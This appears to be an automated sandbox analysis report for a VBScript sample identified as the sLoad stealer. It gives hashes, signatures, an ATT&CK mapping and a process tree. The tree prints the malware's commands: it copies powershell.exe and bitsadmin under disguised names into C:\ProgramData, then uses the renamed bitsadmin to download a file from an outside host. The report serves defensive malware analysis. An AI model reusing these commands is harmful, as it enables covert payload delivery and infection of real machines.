sload | db2b2aca54ef81c93e298620e3a8dc6ca812335f0306924fb060d2bd9fe0fc28

Analysis

max time kernel
119s
max time network
120s
platform
windows7_x64
resource
win7-20240220-en
resource tags

arch:x64arch:x86image:win7-20240220-enlocale:en-usos:windows7-x64system
submitted
06-07-2024 21:00

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

29559f995653dd2346c9dfbd082e8106_JaffaCakes118.vbs
Size

9KB
MD5

29559f995653dd2346c9dfbd082e8106
SHA1

5234aa0c46b9cd856d42d9952da3710edbebb329
SHA256

db2b2aca54ef81c93e298620e3a8dc6ca812335f0306924fb060d2bd9fe0fc28
SHA512

a42116e42dd6bbee0a7faf4c4f560ec2e94d03d63fc0a1c1ffe7555f04c80190f6c4c1e5829526823802a7c4226302ae916cfa25a74af6f51633084700096135
SSDEEP

192:VFlRdcLMXrNDN8cPVAXSOh8TOhWDTaDrm8yhFdFxF9:NRgMXrNJ8cPVAXTh8TOsDTaDK8yl

Score

10^/10

sload stealer trojan

Malware Config

Signatures

sLoad
sLoad is a PowerShell downloader that can exfiltrate system information and deliver additional payloads.
trojan stealer sload

Executes dropped EXE 1 IoCs

pid	Process
3028	ZpbZtRqin.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 13 IoCs

description	pid	Process	procid_target
PID 1732 wrote to memory of 1052	1732	WScript.exe	28
PID 1732 wrote to memory of 1052	1732	WScript.exe	28
PID 1732 wrote to memory of 1052	1732	WScript.exe	28
PID 1052 wrote to memory of 2212	1052	cmd.exe	30
PID 1052 wrote to memory of 2212	1052	cmd.exe	30
PID 1052 wrote to memory of 2212	1052	cmd.exe	30
PID 1052 wrote to memory of 2132	1052	cmd.exe	31
PID 1052 wrote to memory of 2132	1052	cmd.exe	31
PID 1052 wrote to memory of 2132	1052	cmd.exe	31
PID 1732 wrote to memory of 3028	1732	WScript.exe	32
PID 1732 wrote to memory of 3028	1732	WScript.exe	32
PID 1732 wrote to memory of 3028	1732	WScript.exe	32
PID 1732 wrote to memory of 3028	1732	WScript.exe	32

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\29559f995653dd2346c9dfbd082e8106_JaffaCakes118.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:1732
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c cmd /c copy /Z c:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\ProgramData\aCWQUoY.exe & cmd /c copy /Y /Z c:\Windows\SysWOW64\bi*.exe C:\ProgramData\ZpbZtRq*.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1052
- - C:\Windows\system32\cmd.exe
    cmd /c copy /Z c:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\ProgramData\aCWQUoY.exe
    3⤵
    PID:2212
- - C:\Windows\system32\cmd.exe
    cmd /c copy /Y /Z c:\Windows\SysWOW64\bi*.exe C:\ProgramData\ZpbZtRq*.exe
    3⤵
    PID:2132
- C:\ProgramData\ZpbZtRqin.exe
  "C:\ProgramData\ZpbZtRqin.exe" /wrap /transfer pNivTrJI https://analyzare.com/annalisa/NRDMSM70P21H501S/lagos.xls C:\ProgramData\lagos.xls
  2⤵
  - Executes dropped EXE
  PID:3028

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\ZpbZtRqin.exe

Filesize
182KB

MD5
0920b14aa67a8b04acf48ffe7c6f0927

SHA1
3421124253058dc21453ebac531b67aeb999f627

SHA256
838670c83e6d1984d0c46e39c196028d292b3a6d2df96183f2f6e408f1a16e00

SHA512
2b0a9800736cb27316be5e376842bce59ce08089046aaef930da837eb59d1c084106ce447320346911c6fa3c8a32e4e41209b12bb868ac2cd9848d69a9adbe51

Download Submit